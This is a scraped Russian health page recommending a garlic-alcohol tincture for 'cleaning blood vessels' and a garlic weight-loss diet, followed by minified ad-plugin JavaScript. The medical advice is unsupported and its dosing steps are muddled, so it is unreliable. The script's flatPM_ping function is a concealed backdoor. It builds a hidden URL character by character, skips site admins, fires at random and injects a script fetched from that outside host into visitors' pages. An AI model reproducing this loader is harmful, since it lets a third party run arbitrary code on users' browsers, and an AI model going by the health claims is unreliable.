Обратите внимание, что все дозировки указаны для людей, которые не имеют хронические заболевания и противопоказания, иначе рекомендуемый объем лекарства следует уменьшать в три раза.

Для очистки сосудов

Ингредиенты:

Приготовление:

1. Чтобы настойка была эффективной понадобится сок чеснока. Для этого в блендере измельчите чесночные зубки.

2. Залить спиртом. Укрыть крышкой и взболтать. Отставить в темное помещение на две недели. В холодильник ставить нельзя.

3. Процедить и настоять еще два дня.

4. Для применения следует настойку разводить в молоке. На 50 мл добавить 3 капли настойки. Затем с каждым последующим приемом увеличивать дозу настойки на каплю. Когда дойдете до 15 капель следует в последующие приемы уменьшать дозировку настойки на каплю, пока не дойдете до трех капель. Затем в каждый прием добавлять по 25 капель. Если почувствуете неприятные ощущения в почках, то снизить дозу до 15 капель. Ежедневно употреблять смесь три раза (до еды за полчаса).

Рекомендуется проводить очищение организма раз в пять лет.

Использование для похудения

Овощ стимулирует обменные процессы, что помогает ускорить сжигание подкожно-жировой клетчатки. В большинстве диет рекомендуется включать в состав блюд сырые чесночные зубки.

Также можно использовать специальную программу на основе чеснока. Каждый день необходимо по нарастающей употреблять чеснок.

В первый день диеты необходимо съесть один чесночный зубок. Затем в последующие дни увеличивать количество на одну дольку, пока не дойдете до 11.

Затем употреблять в обратном направлении, уменьшая количество на один зубок в день, пока не дойдете до одного.

В период такой диеты разрешается употреблять только овощи. Чтобы результат был более действенным, не забывайте заниматься спортом.

Как избавиться от запаха чеснока

Полностью избавиться от специфического запаха не получится. Но возможно уменьшить его действие и сделать дыхание более свежим. Можно съесть кусочек лимона или пожевать петрушку. Также хорошо помогает разжевывание корицы либо семян кардамона. Если указанные продукты не нашлись в хозяйстве, то можно прополоскать рот обычным молоком.

Противопоказания

Как и любое лечебное средство, чеснок имеет ряд противопоказаний:

• Перед применением учитывайте, что ваше дыхание станет не свежим. Резкий запах будут ощущать все окружающие. Поэтому перед важными встречами не рекомендуется употреблять чесночные зубчики.

• У эпилептиков чеснок может спровоцировать приступ.

• Если вы решили худеть, то следует учитывать тот факт, что овощ вызывает аппетит.

• Если во время беременности существует угроза выкидыша, то категорически не рекомендуется употреблять чеснок.

• При кормлении грудью следует с осторожностью относится к чесноку. Попадая в грудное молоко, овощ испортит его вкус и запах. В результате малыш может отказаться от груди.

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};